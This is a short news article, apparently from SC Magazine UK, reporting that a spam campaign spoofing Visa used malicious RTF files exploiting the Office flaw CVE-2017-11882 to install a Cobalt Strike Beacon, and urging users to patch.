Cobalt malware leverages recently patched 17-year-old Microsoft flaw

By
Cobalt malware leverages recently patched 17-year-old Microsoft flaw

Just in the nick of time...

Cobalt malware was documented exploiting the 17-year-old CVE-2017-11882 vulnerability via spam just a few days after researchers noted a similar spam campaign exploiting an RTF documents.

Microsoft only recently patched the memory corruption vulnerability that exists in the Office software when the program fails to properly handle objects in memory. The flaw could allow an attacker to run arbitrary code.

Shortly after the vulnerability was announced threat actors weaponised the flaw to deliver a malware using a component from a Cobalt Strike penetration testing tool, according to a Nov. 27 Fortinet blogpost. The malware is spread via a spam campaign posing as a notification from Visa about rule changes in its payWave service in Russia and is contained in a malicious RTF document attachment.

Researchers said the CVE-2017-11882 exploit leads to a Cobalt Strike Beacon and that in this attack, multiple stages of scripts are downloaded and executed to get to the main malware payload. Once the exploit is triggered, an obfuscated JavaScript is downloaded and is executed by using Microsoft HTML Application Host.

“Once the document is opened, the user is presented with a plain document,” researchers said in the post. “However, in the background a PowerShell script is already being spawned that will eventually download a Cobalt Strike client to take control of the victim's system.”

The cyber-criminals behind the attack were able to load Cobalt Strike's module without the need to write it as a physical file but instead by using the trusted Microsoft Windows tools to run client-side scripts, which can be overlooked by traditional anti-virus products.

Users are urged to update their systems as soon as possible to avoid infection.

This article originally appeared at scmagazineuk.com

Copyright © SC Magazine, UK edition
Tags:

Most Read Articles

The new Telstra – only 20 years in the making...

The new Telstra – only 20 years in the making...

How to: Boot Windows 10 in Safe Mode

How to: Boot Windows 10 in Safe Mode

Spyro Reignited Trilogy first gameplay shows it could be the perfect nostalgia trip

Spyro Reignited Trilogy first gameplay shows it could be the perfect nostalgia trip

PUBG tips

PUBG tips

Most popular tech stories